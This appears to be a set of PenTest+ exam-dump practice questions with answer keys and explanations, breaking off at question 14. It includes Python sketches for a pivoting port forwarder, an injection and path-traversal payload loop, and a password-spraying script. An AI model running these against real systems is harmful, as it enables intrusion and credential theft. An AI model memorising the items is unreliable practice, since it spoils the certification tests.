CompTIA PenTest+ PT0-003 Exam Dumps and Practice Test Questions Set 1 Q1-20
Question 1:
Which technique is least likely to be used for passive information gathering during the reconnaissance phase of a penetration test?
A) Querying public WHOIS records
B) Conducting a ping sweep against the target network
C) Harvesting employee details from social media profiles
D) Reviewing company press releases and job postings
Answer: B) Conducting a ping sweep against the target network
Explanation:
Querying public WHOIS records is a classic example of passive reconnaissance. When an attacker or penetration tester queries a domain’s WHOIS information, they access publicly available records that list details such as domain registrant, administrative and technical contacts, domain registrar, registration and expiration dates, and name servers. This method is entirely passive because it does not send traffic to the target network itself. It merely retrieves information from public databases and helps testers or attackers build a profile of the organization. By understanding who owns the domain and which contacts are linked, the tester can plan further steps such as social engineering or email reconnaissance. Additionally, WHOIS queries may provide hints about the underlying infrastructure, such as the domain’s authoritative name servers and hosting relationships, which could become important in later stages of testing. The crucial point here is that it leaves no footprint on the organization’s systems, making it a low-risk, passive method.
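To illustrate how lightweight such a lookup is, the minimal Python sketch below speaks the WHOIS protocol (a plain-text query over TCP port 43) directly. The server shown answers for .com/.net registrations, and both the server and the domain are placeholders that vary by TLD.

```python
import socket

def whois_query(domain: str, server: str = "whois.verisign-grs.com") -> str:
    """Send a raw WHOIS query (RFC 3912) over TCP port 43 and return the reply."""
    with socket.create_connection((server, 43), timeout=10) as sock:
        sock.sendall((domain + "\r\n").encode())
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")

if __name__ == "__main__":
    # whois.verisign-grs.com serves .com/.net; other TLDs use different registry servers.
    print(whois_query("example.com"))
```

Note that the only traffic generated goes to the registry’s WHOIS server, never to the target organization.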
Conducting a ping sweep, on the other hand, is an active reconnaissance technique. In a ping sweep, ICMP echo requests are sent to a range of IP addresses to determine which hosts are alive on a network. While this may seem simple, it generates direct traffic to the target network and can be logged or flagged by intrusion detection systems or firewalls. Ping sweeps can alert administrators to the tester’s presence because the probe traffic and any replies are visible to firewalls, IDS sensors, and host logs. Unlike WHOIS queries, which are external and passive, ping sweeps interact directly with the infrastructure, creating a footprint. This exposure makes it unsuitable as a passive method. Although effective for mapping live hosts, it is detectable and technically active, which is why it is considered the least passive technique in this context.
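By contrast, even a bare-bones ping sweep sends packets straight at the target range. The sketch below assumes a Linux-style ping binary (the -c/-W flags differ on other platforms) and uses the documentation range 192.0.2.0/29 as a stand-in for an authorized scope.

```python
import ipaddress
import subprocess

def ping_sweep(network: str) -> list[str]:
    """Send one ICMP echo request to every host in the range and collect responders."""
    live_hosts = []
    for host in ipaddress.ip_network(network).hosts():
        result = subprocess.run(
            ["ping", "-c", "1", "-W", "1", str(host)],  # Linux flags: one probe, one-second timeout
            capture_output=True,
        )
        if result.returncode == 0:  # exit code 0 means the host answered
            live_hosts.append(str(host))
    return live_hosts

if __name__ == "__main__":
    print(ping_sweep("192.0.2.0/29"))
```

Every one of those ICMP probes can be logged by the target’s firewalls and sensors, which is exactly why the technique counts as active.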
Harvesting employee details from social media profiles is another passive method. Many employees post information about their roles, team structure, projects, and even technologies used within their organizations on platforms like LinkedIn, Twitter, or GitHub. Attackers and penetration testers can gather a wealth of information without touching the organization’s internal systems. This method does not generate network traffic to the target infrastructure, and it is extremely difficult for organizations to detect. It allows testers to build a profile for potential social engineering attacks or targeted phishing campaigns, which is part of the reconnaissance phase.
Reviewing company press releases, job postings, and other publicly available documents is also passive. Press releases may indicate new technology deployments, mergers, or changes in leadership. Job postings can reveal the technologies in use, infrastructure details, and security responsibilities. Like social media harvesting, this approach relies entirely on publicly available information and does not generate alerts on internal systems.
In conclusion, among the four choices, a ping sweep stands out as the least passive technique because it directly interacts with the target network, potentially alerting administrators. WHOIS queries, social media research, and reviewing public documents are all passive techniques because they do not trigger alerts or leave footprints on the target systems. Therefore, B is the correct answer.
Question 2:
During a penetration test, a tester obtains a dumped hash file from a compromised Windows host. Which of the following is the most appropriate immediate next step under a professional test agreement?
A) Attempt to crack the hashes offline using GPU-accelerated tools to recover plaintext passwords
B) Report the hash file to the target organization’s security team and await further instructions
C) Use the hashes to perform a pass-the-hash attack against other systems in the environment
D) Publish the hashes on a public breach notification site to pressure remediation
Answer: B) Report the hash file to the target organization’s security team and await further instructions
Explanation:
Attempting to crack password hashes offline using tools like Hashcat or John the Ripper is a technical possibility, and many penetration testers might consider it to simulate real-world attacks. However, cracking hashes without explicit client approval may violate the rules of engagement and could expose sensitive credentials that the organization is not prepared to handle. GPU-accelerated tools can rapidly process large password sets, which increases the risk that sensitive passwords could be exposed or misused. This is especially problematic if the hashes belong to privileged accounts, as exposure could lead to a significant breach outside the scope of the test. Therefore, while technically feasible, this approach is not the safest or most appropriate immediate action.
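For context only, offline cracking boils down to hashing candidate passwords and comparing the results with the captured hashes. The toy sketch below uses SHA-256 rather than the NTLM format real Windows dumps contain, and stands in for what Hashcat or John the Ripper do at vastly greater speed; in a real engagement this step happens only after the client authorizes it.

```python
import hashlib

def dictionary_attack(target_hash: str, wordlist: list[str]) -> str | None:
    """Hash each candidate and compare it with the captured hash."""
    for candidate in wordlist:
        if hashlib.sha256(candidate.encode()).hexdigest() == target_hash:
            return candidate
    return None

# Toy demonstration: the "captured" hash is generated locally for illustration.
captured = hashlib.sha256(b"Summer2024!").hexdigest()
print(dictionary_attack(captured, ["password", "letmein", "Summer2024!"]))  # -> Summer2024!
```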
Reporting the hash file to the organization’s security team is the professional and responsible step. Under a penetration testing engagement, testers operate under a formal contract that defines what actions are allowed. The discovery of hash files is sensitive because it represents potential compromise of credentials. By reporting it, testers preserve confidentiality, avoid unauthorized exploitation, and allow the organization to determine the next steps. This could include authorizing offline cracking or implementing further monitoring. Immediate reporting aligns with ethical standards and ensures compliance with legal and contractual obligations.
Using the hashes to perform a pass-the-hash attack against other systems may simulate real attacker behavior, but doing so without explicit permission exceeds the engagement scope. Such lateral movement could disrupt operations or compromise systems unexpectedly, potentially creating liability. Although pass-the-hash attacks are realistic from a technical perspective, executing them without authorization is not appropriate at this stage.
Publishing the hashes publicly is outright unethical and illegal. It violates the confidentiality requirements of penetration testing agreements and exposes sensitive organizational data to third parties, potentially resulting in reputational damage, legal action, or regulatory penalties. This is never acceptable under professional standards.
In summary, reporting the discovery to the client and following the agreed-upon escalation process preserves ethical and legal boundaries, ensures responsible handling of sensitive information, and maintains the professional integrity of the engagement. Therefore, B is the correct answer.
Question 3:
Which control is most effective at preventing credential harvesting via phishing emails?
A) Implementing SPF, DKIM, and DMARC for email
B) Enforcing password complexity rules
C) Installing endpoint antivirus on all workstations
D) Conducting background checks on employees
Answer: A) Implementing SPF, DKIM, and DMARC for email
Explanation:
SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail), and DMARC (Domain-based Message Authentication, Reporting & Conformance) are email authentication protocols that work together to prevent email spoofing, a key component of phishing attacks. SPF allows email servers to verify that incoming mail claiming to be from a specific domain is sent from an authorized IP address. DKIM adds a cryptographic signature to messages, which ensures the content has not been tampered with and confirms the sender’s domain. DMARC builds on both SPF and DKIM by specifying how receiving servers should handle messages that fail authentication checks, allowing organizations to reject or quarantine suspicious emails. This layered approach is highly effective in preventing attackers from sending phishing emails that appear to come from trusted internal sources, directly reducing credential harvesting risk.
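Because all three controls are published as DNS TXT records, their presence is easy to verify. The sketch below uses the third-party dnspython package and a placeholder domain; the DKIM record is not queried because it lives at a sender-specific selector (selector._domainkey.domain).

```python
import dns.resolver  # third-party: pip install dnspython

def txt_records(name: str) -> list[str]:
    """Return all TXT records published for a DNS name."""
    try:
        return [r.to_text().strip('"') for r in dns.resolver.resolve(name, "TXT")]
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer):
        return []

domain = "example.com"  # placeholder domain
spf = [r for r in txt_records(domain) if r.startswith("v=spf1")]
dmarc = [r for r in txt_records(f"_dmarc.{domain}") if r.startswith("v=DMARC1")]
print("SPF:  ", spf)
print("DMARC:", dmarc)
```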
Enforcing password complexity rules strengthens password security and reduces the risk of brute-force attacks, but it does not prevent users from voluntarily giving credentials to attackers through phishing. Users may still fall victim to social engineering, and strong passwords alone cannot mitigate phishing campaigns.
Installing endpoint antivirus can detect malicious attachments or malware delivered through phishing emails, but it does not prevent users from submitting their credentials voluntarily in a phishing scenario. While antivirus helps prevent system compromise, it does not stop the human element of credential disclosure.
Conducting background checks may help mitigate insider threats, but it does not address phishing threats coming from external actors. Credential harvesting through phishing exploits human psychology rather than internal malicious intent.
Because SPF, DKIM, and DMARC specifically prevent email spoofing and ensure only legitimate messages reach users, they are the most effective control to prevent credential harvesting via phishing. Therefore, A is the correct answer.
Question 4:
A penetration tester discovers an outdated web application that reveals full stack traces when errors are triggered. Which risk is most directly introduced by this behavior?
A) Information leakage that facilitates further exploitation
B) Increased service latency under heavy load
C) Denial of service from malformed requests
D) Data tampering due to weak integrity controls
Answer: A) Information leakage that facilitates further exploitation
Explanation:
Stack traces are detailed reports generated by a web application when an error occurs. They typically include the path of execution in the code, functions called, parameters used, and sometimes even database query information. In a secure application, error messages should be generic, revealing only that an error occurred. However, when stack traces are displayed to users, they expose internal implementation details that attackers can exploit. This type of vulnerability is classified as information leakage because it provides attackers with knowledge about the application’s structure, coding practices, library versions, and potentially sensitive configuration details.
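The defensive fix is straightforward: log the full trace server-side and return only a generic message to the client. The sketch below shows one way to do that in Flask, chosen here purely as an example framework; the route and the leaked connection string are hypothetical.

```python
import logging
from flask import Flask, jsonify

app = Flask(__name__)

@app.errorhandler(Exception)
def handle_unexpected_error(exc):
    logging.exception("Unhandled error")                              # full trace stays in server logs
    return jsonify({"error": "An internal error occurred."}), 500     # generic message to the user

@app.route("/fail")
def fail():
    # With debug mode enabled, this detail would be rendered to the browser.
    raise RuntimeError("db connection string: db://admin@10.0.0.5")

if __name__ == "__main__":
    app.run(debug=False)  # debug=True would expose full stack traces to clients
```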
Increased service latency under heavy load refers to performance degradation rather than a security risk. While displaying stack traces may slightly slow responses due to additional logging or rendering, it is not the primary risk. Attackers do not gain a direct advantage from latency, and it does not provide actionable intelligence for exploitation.
Denial of service (DoS) involves overloading systems to cause service unavailability. While malformed requests could crash an application in some cases, stack traces themselves do not inherently produce DoS conditions. They reveal information rather than directly impact availability.
Data tampering due to weak integrity controls refers to attackers modifying information without detection. Stack traces may reveal data structures or code flow, but they do not allow an attacker to alter stored data directly. The risk is more about knowledge exposure than manipulation.
Information leakage facilitates further exploitation because attackers can use the details revealed to identify specific vulnerabilities, such as unpatched functions, outdated libraries, or unsafe error handling practices. For example, knowing which database is in use can help craft SQL injection attacks, while details about frameworks may reveal default credentials or misconfigurations. Attackers can combine stack trace information with other reconnaissance techniques to plan targeted attacks with higher success probability.
Full stack traces are particularly dangerous because they may reveal sensitive data such as usernames, file paths, or API keys. Even if these values are partial, they provide attackers with enough intelligence to craft subsequent attacks. Therefore, the primary concern is not latency, DoS, or data tampering but rather the disclosure of internal implementation details that could make exploitation significantly easier.
In conclusion, the risk most directly introduced by revealing full stack traces is information leakage that facilitates further exploitation. Attackers gain detailed insight into the application, allowing more efficient targeting of vulnerabilities. While other options describe potential secondary issues, the critical threat is knowledge disclosure. Therefore, A is the correct answer.
Question 5:
Which best describes the primary purpose of a pivot during a penetration test?
A) To escalate privileges on a single host
B) To move laterally and reach additional network segments
C) To exfiltrate sensitive data from the compromised host
D) To maintain persistence on the local machine
Answer: B) To move laterally and reach additional network segments
Explanation:
Pivoting is a core concept in penetration testing and red team operations. When a tester compromises a host within a network, that host can serve as a bridge to access other devices or network segments that were previously unreachable. The goal of pivoting is to extend the attack surface by moving laterally within the organization’s infrastructure. By leveraging the compromised host, attackers can bypass firewalls, segmentation controls, or other network restrictions. Pivoting often involves using techniques such as tunneling, port forwarding, or proxying traffic through the compromised system.
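In practice pivoting is usually done with SSH forwarding, SOCKS proxies, or framework features such as Meterpreter’s port forwarding, but the underlying mechanic is just a relay. The sketch below is a minimal TCP port forwarder that, if run on a compromised host, would relay the tester’s traffic to an internal address the tester cannot reach directly; the addresses and ports are placeholders.

```python
import socket
import threading

def pipe(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes one way until the connection closes."""
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        dst.close()

def forward(listen_port: int, target_host: str, target_port: int) -> None:
    """Accept connections locally and relay each one to the internal target."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("0.0.0.0", listen_port))
    listener.listen(5)
    while True:
        client, _ = listener.accept()
        remote = socket.create_connection((target_host, target_port))
        threading.Thread(target=pipe, args=(client, remote), daemon=True).start()
        threading.Thread(target=pipe, args=(remote, client), daemon=True).start()

if __name__ == "__main__":
    # Traffic hitting port 8080 on the pivot host is relayed to 10.10.20.5:445 (placeholder).
    forward(8080, "10.10.20.5", 445)
```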
Privilege escalation, while important, is different from pivoting. Privilege escalation refers to increasing access rights on a single host, such as obtaining administrative or root-level permissions. While elevated privileges are often a prerequisite for successful pivoting, privilege escalation alone does not enable lateral movement across multiple network segments.
Exfiltrating sensitive data is a common objective for attackers but does not define pivoting itself. Pivoting is a strategic action to gain broader network access, whereas data exfiltration is a subsequent goal that may occur once lateral movement has been achieved. Exfiltration could happen on a single host or after multiple pivots, but it is not the primary definition of pivoting.
Maintaining persistence refers to ensuring continued access to a compromised system over time. Persistence can involve creating backdoors, scheduled tasks, or startup scripts. While persistence may be maintained on a host used for pivoting, it is a separate goal from lateral movement. Pivoting is about network expansion and access, not simply staying undetected on the initial host.
The essence of pivoting is lateral movement and network expansion. Without pivoting, attackers or testers may be limited to the initial point of compromise. Pivoting enables a more comprehensive evaluation of the organization’s network segmentation, access controls, and monitoring capabilities. By using the compromised host as a pivot, testers can simulate realistic attacker behavior, demonstrating how an intruder could move through the network, reach critical systems, and potentially exfiltrate sensitive information.
In conclusion, pivoting is primarily about moving laterally to access additional network segments. While privilege escalation, data exfiltration, and persistence are important components of an attack chain, the defining feature of pivoting is lateral movement. Therefore, B is the correct answer.
Question 6:
Which assessment activity evaluates whether an organization’s documented security procedures are actually followed by staff?
A) Vulnerability scanning
B) Policy review
C) Social engineering engagement
D) Code review
Answer: C) Social engineering engagement
Explanation:
Vulnerability scanning is a technical assessment technique that focuses on identifying weaknesses in systems, applications, or network infrastructure. Scanners look for unpatched software, misconfigurations, open ports, or other vulnerabilities that could be exploited by attackers. While this activity provides valuable insight into technical security gaps, it does not measure how employees behave in real-world scenarios or whether they adhere to organizational security policies. Vulnerability scanning evaluates the system, not human compliance, and therefore is not sufficient for understanding procedural adherence.
Policy review involves examining written documentation, such as security manuals, standard operating procedures, or regulatory compliance guides. Reviewing policies ensures that an organization has defined acceptable behaviors, processes, and security controls. However, simply reading policies does not reveal whether employees actually follow them in daily operations. There is a potential disconnect between documented procedures and real-world practices, which makes policy review incomplete for evaluating procedural adherence.
Social engineering engagement, on the other hand, is specifically designed to test human behavior in the context of security procedures. This may include simulated phishing attacks, pretexting phone calls, or physical access attempts. By observing employee responses, testers can assess whether staff follow authentication procedures, handle sensitive information appropriately, and adhere to incident reporting guidelines. Social engineering engagements provide a direct, real-world measurement of compliance and the effectiveness of security awareness training. These tests help organizations identify gaps in understanding, negligence, or risky behaviors that could lead to breaches.
Code review is a practice focused on analyzing application source code for security flaws, bugs, or logic errors. While it is critical for finding vulnerabilities in software, code review does not evaluate human adherence to policies. It addresses technical quality rather than employee behavior or procedural compliance.
The primary purpose of assessing compliance with documented procedures is to determine if staff act according to expectations when faced with realistic security scenarios. Social engineering engagements reveal whether employees recognize threats, follow multi-factor authentication requirements, properly handle sensitive data, and report suspicious activity. They bridge the gap between policy and practice, identifying where human error or oversight could lead to organizational risk.
In conclusion, social engineering engagement directly tests human behavior against documented procedures, making it the most effective activity for this purpose. Vulnerability scanning, policy review, and code review provide complementary technical or administrative insights but do not evaluate whether employees consistently follow security procedures. Therefore, C is the correct answer.
Question 7:
Which metric best measures the success of a red team exercise focused on detection and response?
A) Number of vulnerabilities found
B) Time-to-detection of simulated intrusions
C) Percentage of systems scanned
D) Total hours spent by red team members
Answer: B) Time-to-detection of simulated intrusions
Explanation:
The number of vulnerabilities found measures technical weaknesses in systems but does not directly reflect how well an organization can detect and respond to attacks. While identifying vulnerabilities is important for overall security posture, it does not evaluate the effectiveness of the monitoring and incident response teams. This metric provides insight into system exposure but not operational performance in detecting attacks.
Time-to-detection (TTD) measures how long it takes the organization’s security team to identify malicious or suspicious activity during a red team exercise. It directly reflects the effectiveness of monitoring tools, alerting processes, and incident response workflows. A shorter TTD indicates a strong detection capability and demonstrates that the organization can identify intrusions before attackers achieve significant objectives. This metric aligns perfectly with the purpose of red team exercises, which is to simulate real attacks and evaluate defensive capabilities rather than simply discovering technical vulnerabilities.
Percentage of systems scanned reflects the scope of the assessment, but it is an operational metric rather than an indicator of detection or response performance. Scanning coverage ensures that testing encompasses the intended infrastructure, yet it does not measure how quickly attacks are detected or mitigated.
Total hours spent by red team members quantifies effort but does not provide actionable insight into the organization’s defensive capabilities. While it can reflect resource allocation, it does not indicate success in detecting and responding to threats.
The primary goal of a red team exercise is to simulate adversary behavior in a realistic scenario, including lateral movement, exploitation, and data exfiltration. Success is therefore measured by how effectively the organization identifies and responds to these simulated attacks. Time-to-detection captures the speed and efficiency of security monitoring and operational readiness, providing measurable evidence of the organization’s defensive maturity. It enables organizations to benchmark performance, identify gaps, and improve incident response processes.
In conclusion, among the four choices, time-to-detection is the metric that directly evaluates the success of a red team exercise focused on detection and response. Other metrics such as vulnerabilities found, percentage of systems scanned, or hours spent are useful supplementary data but do not measure detection effectiveness. Therefore, B is the correct answer.
Question 8:
Which control most effectively reduces the risk of attackers exploiting default credentials on network devices?
A) Network segmentation
B) Disable unused physical ports
C) Enforce a secure configuration baseline and credential rotation
D) Deploy an IDS to monitor failed login attempts
Answer: C) Enforce a secure configuration baseline and credential rotation
Explanation:
Network segmentation divides the network into isolated segments to limit lateral movement by attackers. While segmentation improves security posture, it does not address the issue of default credentials on network devices. An attacker could still compromise a device within a segment if default credentials exist. Segmentation limits exposure but is not a direct control for credential misuse.
Disabling unused physical ports reduces the attack surface by preventing unauthorized physical connections. However, it does not affect credential security. Default accounts remain exploitable through legitimate network interfaces, meaning attackers could still gain unauthorized access. While this measure complements overall security, it does not solve the primary problem of weak or default passwords.
Enforcing a secure configuration baseline ensures that devices are configured according to security best practices, including the removal or renaming of default accounts. Credential rotation involves changing passwords regularly, particularly for administrative or privileged accounts, which prevents attackers from relying on known default credentials. Combined, these measures directly mitigate the risk of exploitation by ensuring that all accounts are secured and periodically updated. They also support compliance with industry standards and regulatory requirements.
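A baseline check and rotation can be automated. The sketch below is illustrative only: the default-credential list is a small hypothetical sample, and the generator simply produces a strong random replacement using Python’s secrets module.

```python
import secrets
import string

# Hypothetical sample of vendor defaults; real baselines draw on vendor documentation.
VENDOR_DEFAULTS = {("admin", "admin"), ("admin", "password"), ("cisco", "cisco")}

def violates_baseline(username: str, password: str) -> bool:
    """Flag accounts that still match a known vendor default."""
    return (username.lower(), password.lower()) in VENDOR_DEFAULTS

def rotated_credential(length: int = 20) -> str:
    """Generate a strong replacement password for rotation."""
    alphabet = string.ascii_letters + string.digits + "!@#$%^&*-_"
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(violates_baseline("admin", "admin"))  # True -> rotate immediately
print(rotated_credential())
```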
Deploying an IDS (intrusion detection system) to monitor failed login attempts can alert administrators to potential unauthorized access attempts. While monitoring is valuable for detecting attacks, it does not prevent an attacker from successfully exploiting default credentials before detection. IDS is reactive rather than preventive in this context.
The most effective approach for mitigating the risk of default credential exploitation is to implement a secure configuration baseline combined with regular credential rotation. This proactive control ensures that devices are hardened, unnecessary default accounts are removed, and administrative credentials remain secure over time. Other measures like segmentation, port disabling, and IDS monitoring support security but do not directly address the root cause.
In conclusion, enforcing a secure configuration baseline and credential rotation is the primary control for reducing the risk of attackers exploiting default credentials on network devices. Therefore, C is the correct answer.
Question 9:
Which hashing property ensures a small change in input produces a significantly different output?
A) Determinism
B) Collision resistance
C) Avalanche effect
D) Preimage resistance
Answer: C) Avalanche effect
Explanation:
Determinism in hashing ensures that the same input always produces the same output. This is essential for verifying data integrity and comparing hashes, but determinism does not describe the behavior of a hash when the input changes slightly. Deterministic behavior only guarantees consistency, not the sensitivity to input changes.
Collision resistance refers to the difficulty of finding two different inputs that produce the same hash output. While important for preventing certain attacks like hash collisions, collision resistance does not describe the phenomenon in which small changes in input drastically affect the output. It focuses on uniqueness rather than sensitivity.
The avalanche effect is a property of cryptographic hash functions whereby a tiny change in input, even a single bit, causes the output to change drastically. This ensures that similar inputs do not produce similar hash outputs, making it extremely difficult for attackers to predict hash values or infer relationships between inputs. The avalanche effect is critical for security applications such as digital signatures, password hashing, and integrity verification. It ensures that small modifications to data—intentional or accidental—are immediately apparent through a completely different hash.
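The effect is easy to observe with a few lines of Python: changing a single character of the input flips roughly half of the 256 output bits of SHA-256.

```python
import hashlib

def bit_difference(a: bytes, b: bytes) -> int:
    """Count how many bits differ between two equal-length digests."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))

d1 = hashlib.sha256(b"hello world").digest()
d2 = hashlib.sha256(b"hello worle").digest()  # last character changed

print(hashlib.sha256(b"hello world").hexdigest())
print(hashlib.sha256(b"hello worle").hexdigest())
print(f"{bit_difference(d1, d2)} of 256 bits differ")  # typically close to 128
```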
Preimage resistance ensures that given a hash output, it is computationally infeasible to determine the original input. While preimage resistance protects against reverse engineering of hashes, it does not address the effect of small changes in the input on the output.
The avalanche effect is fundamental for cryptographic security because it ensures that hash outputs are highly sensitive to input variations, thereby enhancing unpredictability and preventing pattern recognition. Determinism ensures consistency, collision resistance protects against duplicate outputs, and preimage resistance prevents input recovery, but only the avalanche effect explains the drastic output changes from minor input modifications.
In conclusion, the property that ensures a small change in input produces a significantly different output is the avalanche effect, making C the correct answer.
Question 10:
Which tool is most suitable for validating web application input handling by submitting crafted requests?
A) Static code analyzer
B) Dynamic application scanner (DAST)
C) Network protocol analyzer
D) Configuration compliance scanner
Answer: B) Dynamic application scanner (DAST)
Explanation:
A static code analyzer examines the source code of an application to detect vulnerabilities, insecure coding patterns, or logic errors. While useful for identifying weaknesses during development, static analysis does not interact with the running application and therefore cannot validate runtime input handling or response behavior.
A dynamic application scanner (DAST) tests the application in its running environment. It submits crafted requests, simulates attacks such as SQL injection or cross-site scripting, and observes how the application responds. DAST is designed to evaluate input validation, error handling, and overall application behavior under attack conditions. It mimics how real attackers interact with the live application and provides actionable insights on vulnerabilities that may be exploitable in production.
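A full DAST product crawls the application and fingerprints its responses, but the core loop resembles the sketch below: submit crafted input and inspect what comes back. The URL, parameter name, and payload list are hypothetical, and the requests package is a third-party dependency.

```python
import requests  # third-party: pip install requests

TARGET = "http://testapp.local/search"          # placeholder; test only in-scope applications
PAYLOADS = ["' OR '1'='1", "<script>alert(1)</script>", "../../etc/passwd"]

for payload in PAYLOADS:
    resp = requests.get(TARGET, params={"q": payload}, timeout=10)
    reflected = payload in resp.text            # naive check for unsanitized reflection
    print(f"{payload!r}: status={resp.status_code} reflected={reflected}")
```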
A network protocol analyzer captures and inspects network traffic to analyze protocols, performance, or anomalies. While it is useful for diagnosing network issues, it does not generate input specifically to test web application handling, nor does it simulate attack scenarios.
A configuration compliance scanner checks system and application settings against predefined security policies. This ensures adherence to baseline security requirements but does not test input validation or application behavior under malicious inputs.
DAST is the most suitable tool for validating web application input handling because it interacts with the running system, submits crafted requests, and identifies vulnerabilities based on observed behavior. Static analysis, protocol analysis, and compliance scanning provide important insights but cannot test runtime input handling in a realistic manner.
In conclusion, a dynamic application scanner (DAST) is the correct choice for evaluating web application input handling, making B the correct answer.
Question 11:
A penetration tester finds that a company’s VPN allows unlimited failed login attempts before locking out. Which type of attack is most likely to succeed against this configuration?
A) Password spraying
B) Phishing
C) SQL injection
D) Cross-site scripting
Answer: A) Password spraying
Explanation:
Password spraying attacks involve attempting a small number of commonly used passwords against many user accounts, rather than focusing on a single account with repeated guesses. This technique exploits accounts with weak passwords while avoiding detection mechanisms that trigger after multiple failed attempts on a single account. In the context of a VPN that allows unlimited failed login attempts, an attacker can systematically attempt known or commonly used passwords across all accounts without ever causing a lockout. This approach significantly increases the probability of successfully compromising at least one account without alerting security monitoring systems.
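The spraying pattern itself is simple: one common password is tried against every account, then the attacker waits before the next round. The sketch below is a conceptual illustration against a hypothetical login endpoint; the URL, form fields, and success check are assumptions, and running anything like this requires explicit authorization.

```python
import time
import requests  # third-party: pip install requests

LOGIN_URL = "https://vpn.example.com/auth"      # hypothetical endpoint
USERNAMES = ["alice", "bob", "carol"]           # gathered during reconnaissance
COMMON_PASSWORDS = ["Winter2024!", "Password1"]

for password in COMMON_PASSWORDS:
    for user in USERNAMES:                      # one guess per account per round
        resp = requests.post(LOGIN_URL, data={"user": user, "pass": password}, timeout=10)
        if resp.status_code == 200:             # real tools key off the actual success response
            print(f"Possible valid credential: {user}:{password}")
    time.sleep(1800)                            # pause between rounds to stay below alert thresholds
```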
Phishing attacks rely on social engineering to trick users into voluntarily providing credentials or clicking malicious links. While phishing is a common and effective attack vector, it is not directly enabled or enhanced by unlimited login attempts on a VPN. The VPN configuration in question affects automated login attempts and does not directly impact phishing success. Phishing requires user interaction rather than exploitation of system configuration, which is why it is not the primary risk here.
SQL injection targets vulnerabilities in database query processing, where malicious input can manipulate backend databases. VPN authentication systems typically do not expose SQL query interfaces in a way that allows attackers to inject commands. While SQL injection is a critical web application threat, it is unrelated to the scenario of unlimited VPN login attempts. It does not exploit authentication policy weaknesses directly.
Cross-site scripting (XSS) attacks exploit web applications by injecting malicious client-side scripts into web pages. This allows attackers to manipulate the behavior of web applications in users’ browsers but does not involve attempting multiple login attempts on VPN systems. XSS is a client-side vulnerability and does not relate to authentication brute-force risks.
Unlimited failed login attempts directly facilitate credential-based attacks like password spraying, because the attacker can attempt a list of common passwords against all accounts without facing lockout thresholds. This creates an environment where a relatively simple automated attack can succeed, particularly if users have weak passwords. In addition, such a configuration increases exposure to brute-force attacks and emphasizes the need for account lockout policies, multi-factor authentication, and monitoring for unusual login patterns.
Therefore, password spraying is the attack most likely to succeed under these circumstances, making A the correct answer.
Question 12:
Which security control would most effectively limit an attacker’s ability to move laterally after compromising a vulnerable web server?
A) Web application firewall
B) Network segmentation
C) Patch management
D) Endpoint detection and response
Answer: B) Network segmentation
Explanation:
A web application firewall (WAF) inspects HTTP requests and filters malicious input to protect web applications. While a WAF can block specific attacks like SQL injection, cross-site scripting, or parameter tampering, it does not physically isolate systems from other parts of the network. A WAF protects the web application but does not prevent attackers from moving laterally to exploit other internal systems once the perimeter is bypassed.
Network segmentation divides the network into isolated zones, restricting access between critical and less critical segments. By separating sensitive systems from general user networks, segmentation limits the ability of attackers to move laterally after exploiting a single vulnerable server. Even if the web server is compromised, segmentation prevents the attacker from immediately reaching critical internal assets. This control reduces attack surface exposure, enforces the principle of least privilege, and provides better containment of potential breaches. Network segmentation is a proactive measure that directly mitigates the risk associated with exploiting vulnerable hosts.
Patch management ensures that systems and applications are updated to fix known vulnerabilities. While patching reduces the likelihood of successful exploitation, it does not contain the attack if a system is already compromised. Patch management addresses vulnerability reduction but is not a segmentation or containment control.
Endpoint detection and response (EDR) monitors endpoints for suspicious activity and alerts security teams. EDR provides detection and remediation capabilities but is reactive in nature. While it helps identify attacks in progress, it does not prevent lateral movement or restrict network access. EDR enhances visibility but is not sufficient alone to contain an exploited server.
Network segmentation directly limits the attacker’s reach after compromising a system. It enforces isolation and access controls to critical systems, reducing potential impact. By creating defined zones, organizations can prevent attackers from moving from a vulnerable web server to more sensitive infrastructure. Other controls provide important support but do not directly restrict attacker movement.
Therefore, network segmentation is the most effective control for containing an attacker who compromises a vulnerable web server and limiting lateral movement, making B the correct answer.
Question 13:
A company wants to ensure that only authorized devices can access corporate resources. Which solution is most appropriate?
A) Microsoft Intune
B) Microsoft OneDrive
C) Microsoft Planner
D) Microsoft Defender for Identity
Answer: A) Microsoft Intune
Explanation:
Microsoft Intune is a cloud-based device and application management solution that enforces compliance policies on endpoints. It ensures that only devices meeting security requirements, such as encryption, updated operating systems, or endpoint protection, are allowed to access corporate resources. Intune integrates with conditional access policies in Azure AD to restrict access based on device compliance, making it a highly effective solution for controlling which devices can connect to sensitive systems and data.
Microsoft OneDrive is primarily a cloud storage platform. It allows users to store, share, and synchronize files across devices. While OneDrive includes some access controls, it does not enforce device-level compliance or manage access for all corporate resources. OneDrive is focused on file storage, not device authorization.
Microsoft Planner is a task management and collaboration tool. It helps teams organize work and track progress but has no capabilities to manage device compliance or enforce access controls. Planner is unrelated to device-based access security.
Microsoft Defender for Identity is a monitoring and threat detection solution. It analyzes user behavior and detects potential identity compromise. While valuable for security monitoring and alerting, it does not enforce device authorization or ensure that only compliant endpoints connect to corporate resources.
Intune’s ability to apply device compliance policies, integrate with conditional access, and manage diverse endpoint types provides a comprehensive solution for controlling authorized device access. It allows administrators to prevent unapproved or non-compliant devices from connecting, thereby reducing the risk of data exposure or breaches. Other tools like OneDrive, Planner, and Defender for Identity support collaboration or monitoring but cannot enforce device compliance policies at the access control level.
In conclusion, Microsoft Intune is the solution that directly addresses device authorization for corporate resources, making A the correct answer.
Question 14:
Which type of malware is designed to remain undetected by traditional antivirus and evade monitoring tools?
A) Rootkit
B) Worm
C) Adware
D) Ransomware
Answer: A) Rootkit
Explanation:
